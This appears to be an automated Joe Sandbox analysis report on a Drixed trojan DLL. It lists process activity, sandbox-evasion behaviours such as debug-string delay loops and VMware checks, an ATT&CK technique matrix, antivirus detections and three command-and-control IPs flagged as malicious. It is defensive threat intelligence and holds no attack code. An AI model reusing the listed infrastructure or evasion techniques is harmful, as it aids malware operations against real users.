Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 448

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 426

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WERD744.tmp.WERInternalMetadata.xml.29.dr	Binary or memory string: <SystemManufacturer>VMware, Inc.</SystemManufacturer>
Source: WERDCC3.tmp.xml.29.dr	Binary or memory string: <arg nm="syspro" val="VMware7,1" />
Source: WERD744.tmp.WERInternalMetadata.xml.29.dr	Binary or memory string: <SystemProductName>VMware7,1</SystemProductName>
Source: WERDCC3.tmp.xml.29.dr	Binary or memory string: <arg nm="sysmfg" val="VMware, Inc." />

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECF6D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6ECF6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 664	Jump to behavior

Source: loaddll32.exe, 00000000.00000002.646808145.00000000019A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.362283972.0000000003910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.648957709.0000000003410000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.649564710.00000000039E0000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.596800440.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.590761143.0000000003610000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.637219700.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.632972734.0000000003280000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.646808145.00000000019A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.362283972.0000000003910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.648957709.0000000003410000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.649564710.00000000039E0000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.596800440.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.590761143.0000000003610000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.637219700.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.632972734.0000000003280000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.646808145.00000000019A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.362283972.0000000003910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.648957709.0000000003410000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.649564710.00000000039E0000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.596800440.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.590761143.0000000003610000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.637219700.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.632972734.0000000003280000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.646808145.00000000019A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.362283972.0000000003910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.648957709.0000000003410000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.649564710.00000000039E0000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.596800440.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.590761143.0000000003610000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.637219700.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.632972734.0000000003280000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.646808145.00000000019A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.362283972.0000000003910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.648957709.0000000003410000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.649564710.00000000039E0000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.596800440.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.590761143.0000000003610000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.637219700.0000000003280000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.632972734.0000000003280000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6ECF6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6ECF6D50

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion11	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	21%	Virustotal		Browse
SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	32%	ReversingLabs	Win32.Trojan.Drixed
SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
19.0.rundll32.exe.754756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.0.rundll32.exe.4764756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.2.rundll32.exe.5b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
19.0.rundll32.exe.5b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
14.2.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
17.0.rundll32.exe.4af4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.2.rundll32.exe.f70000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.0.rundll32.exe.4df4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.loaddll32.exe.1250000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
17.0.rundll32.exe.6ecf0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.3300000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
18.2.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
14.2.rundll32.exe.3464756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.0.rundll32.exe.754756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.2.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
19.0.rundll32.exe.5b0000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
19.0.rundll32.exe.6ecf0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
18.0.rundll32.exe.4764756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.2.rundll32.exe.c00000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
17.0.rundll32.exe.f70000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.0.rundll32.exe.3300000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
19.2.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
17.0.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
19.2.rundll32.exe.754756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.0.rundll32.exe.6ecf0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.2.rundll32.exe.e94756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
16.0.rundll32.exe.6ecf0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
18.2.rundll32.exe.4764756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
16.0.rundll32.exe.b20000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
17.0.rundll32.exe.f70000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
18.0.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
16.0.rundll32.exe.b20000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.bd0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
16.0.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.15e4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
16.0.rundll32.exe.1144756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
17.2.rundll32.exe.4af4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.rundll32.exe.4df4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.0.rundll32.exe.c00000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
17.0.rundll32.exe.4af4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.0.rundll32.exe.c00000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
14.2.rundll32.exe.fc0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
16.0.rundll32.exe.1144756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.0.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.vomfass.deDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.vomfass.deDVarFileInfo$	loaddll32.exe, 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.372865791.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.649740233.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.650585460.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.600585830.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.614963241.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.640010436.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.640637691.000000006ED0F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
66.147.235.11	unknown	United States	23535	HOSTROCKETUS	true
149.202.179.100	unknown	France	16276	OVHFR	true
81.0.236.89	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510686
Start date:	28.10.2021
Start time:	05:00:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@28/11@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 55.7% (good quality ratio 51.4%) Quality average: 76.9% Quality standard deviation: 31%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.50.102.62, 204.79.197.200, 13.107.21.200, 23.211.4.86, 23.211.6.115, 52.182.143.212, 20.189.173.21, 20.82.210.154, 20.42.65.92 Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, a-0001.a-afdentry.net.trafficmanager.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
66.147.235.11	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
149.202.179.100	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
81.0.236.89	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTROCKETUS	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	s1uOMLvpO4.exe	Get hash	malicious	Browse	216.120.236.127
	WGs54P9e8a	Get hash	malicious	Browse	216.120.241.108
	ba2Eq178BGXyW5T.exe	Get hash	malicious	Browse	216.120.237.68
	4TXvMuUjTxE2kqz.exe	Get hash	malicious	Browse	66.147.239.119
	Requirements-oct_2020.exe	Get hash	malicious	Browse	66.147.239.119
	JESEE FRIED FIRDAY.exe	Get hash	malicious	Browse	66.147.239.119
	Scan_0884218630071 Bank Swift.exe	Get hash	malicious	Browse	66.147.239.119
	BANK ACCOUNT DETAILS ATTACHED.pdf.exe	Get hash	malicious	Browse	66.147.239.119
	XYmX3bLQJ9.xls	Get hash	malicious	Browse	66.147.238.141
OVHFR	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	arm7	Get hash	malicious	Browse	8.33.207.78
	#U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbs	Get hash	malicious	Browse	144.217.33.249
	Byov62cXa1.exe	Get hash	malicious	Browse	94.23.24.82
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	lyVSOhLA7o.dll	Get hash	malicious	Browse	51.210.102.137
	protocol-1441399238.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1441399238.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1086855687.xls	Get hash	malicious	Browse	192.99.46.215

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5f8c232292098bd3183b3bd76fd57ba47bd4c4b_82810a17_06dfdcd0\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.916995120338525
Encrypted:	false
